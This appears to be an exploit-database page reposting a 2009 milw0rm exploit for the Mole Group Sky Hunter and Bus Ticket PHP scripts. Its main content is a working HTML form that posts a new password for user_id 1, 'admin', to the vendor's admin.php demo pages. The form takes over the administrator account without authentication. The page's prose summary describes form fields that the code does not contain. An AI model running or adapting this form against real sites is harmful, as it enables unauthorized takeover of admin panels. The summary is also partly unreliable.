header-logo
Suggest Exploit
vendor:
Sky Hunter/Bus Ticket Scripts
by:
G4N0K
7,5
CVSS
HIGH
Change Password
264
CWE
Product Name: Sky Hunter/Bus Ticket Scripts
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Mole Group Sky Hunter/Bus Ticket Scripts Change Admin Pass Exploit | G4N0K

Mole Group Sky Hunter/Bus Ticket Scripts is vulnerable to a change password exploit. An attacker can change the admin password by submitting a POST request to the admin.php page with the username, password, new password, and confirm password fields. This allows an attacker to gain access to the admin panel.

Mitigation:

Ensure that the application is using strong authentication and authorization mechanisms.
Source

Exploit-DB raw data:

<html>
<head>
<!-- 
==============================================================================
                      _      _       _          _      _   _ 
                     / \    | |     | |        / \    | | | |
                    / _ \   | |     | |       / _ \   | |_| |
                   / ___ \  | |___  | |___   / ___ \  |  _  |
   IN THE NAME OF /_/   \_\ |_____| |_____| /_/   \_\ |_| |_|
                                                             

==============================================================================
                      ____   _  _     _   _    ___    _  __
                     / ___| | || |   | \ | |  / _ \  | |/ /
                    | |  _  | || |_  |  \| | | | | | | ' / 
                    | |_| | |__   _| | |\  | | |_| | | . \ 
                     \____|    |_|   |_| \_|  \___/  |_|\_\...FROM IRAN

==============================================================================
	Mole Group Sky Hunter/Bus Ticket Scripts Change Admin Pass Exploit
==============================================================================

	[»] Script:.............[ Mole Group Sky Hunter/Bus Ticket Scripts ]..
	[»] Website:............[ http://www.mole-group.com ].................
	[»] Today:..............[ 2205009 ]...................................
	[»] Founder:............[ G4N0K | mail[.]ganok[sh!t]gmail.com ].......


	
	 [+] Vulnerable Scripts
	===============================
       [0] Sky Hunter Script (demo: http://sky.mole-group.com/admin/admin.php)
       [1] Bus Ticket Script (demo: http://bus.mole-group.com/admin/admin.php)



	 [+] Greetz
	===================================
       [»] ALLAH
       [»] MSD, AMD, AFN, SMN, Str0ke...
       [»] Hussain-X, JiKo, Sakab(!)...

-->
<title>Mole Group Sky Hunter/Bus Ticket Scripts Change Admin Pass Exploit | G4N0K</title>

</head>
<body>

 <h3>::Change Password</h3>

	<table>
		<tr>
			<form method="post" action="http://sky.mole-group.com/admin/admin.php">
			<input type="hidden" name="user_id" value="1">
			<td align=right>Username:</td>
			<td align=left><input name="user_name" size="40" maxlength="40" value="admin"><td>
		</tr>
		<tr>
			<td align=right>New Password:</td><td align=left><input name="password" size="40" maxlength="40" ><td>
		</tr>
		<tr>
			<td></td><td><input type="submit" name="submit" value="Change Password"></td>
			</form>
		</tr>
	</table>
</body>
</html>

# milw0rm.com [2009-05-22]

Navigation

Suggest Exploit

Services By CQR